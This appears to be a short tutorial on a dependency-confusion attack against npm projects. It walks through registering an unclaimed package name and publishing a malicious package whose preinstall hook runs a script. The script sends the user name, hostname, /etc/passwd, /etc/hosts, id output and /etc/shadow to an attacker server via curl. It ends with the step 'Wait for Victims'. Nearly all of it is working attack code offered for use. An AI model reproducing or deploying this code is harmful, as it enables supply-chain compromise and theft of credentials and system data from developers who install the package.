1. Identify an Unclaimed Dependency
- Locate the target project’s
package.jsonfile and identify unclaimed dependencies. - Example: The project references
noderedactedsdk, which is not claimed on the npm registry. - Confirm the package is unclaimed by visiting the URL:
https://www.npmjs.com/package/noderedactedsdk.
2. Create a Malicious Package
Create a new directory for the package:
mkdir noderedactedsdk && cd noderedactedsdkLog in to npm:
npm loginInitialize the package:
npm init- Set the package name to **noderedactedsdk**.
- Use a version number higher than the one in the target **package.json** (e.g.,
5.0.0). Create a malicious **index.js** file in the same folder:
const { exec } = require("child_process"); const command = \` curl -X POST "http://yourserver.com/noderedactedsdk/$(whoami)/$(hostname)/" \ -A "$( (cat /etc/passwd /etc/hosts && id && { [ -r /etc/shadow ] && cat /etc/shadow || echo 'No shadow access'; } | base64 | tr '\n' '.')" \ -s -o /dev/null \`; exec(command, (error, stdout, stderr) => { if (error) console.error(error.message); if (stderr) console.log(stderr); console.log(stdout); });Update the
package.jsonfile to include apreinstallscript:{ "name": "noderedactedsdk", "version": "5.0.0", "scripts": { "preinstall": "node index.js" } }
3. Publish the Malicious Package
- Publish the package to npm using the following command:
npm publish
4. Wait for Victims
- Once the package is installed by the target or any client, the
preinstallscript runs, exfiltrating sensitive system information to your server.
No comments yet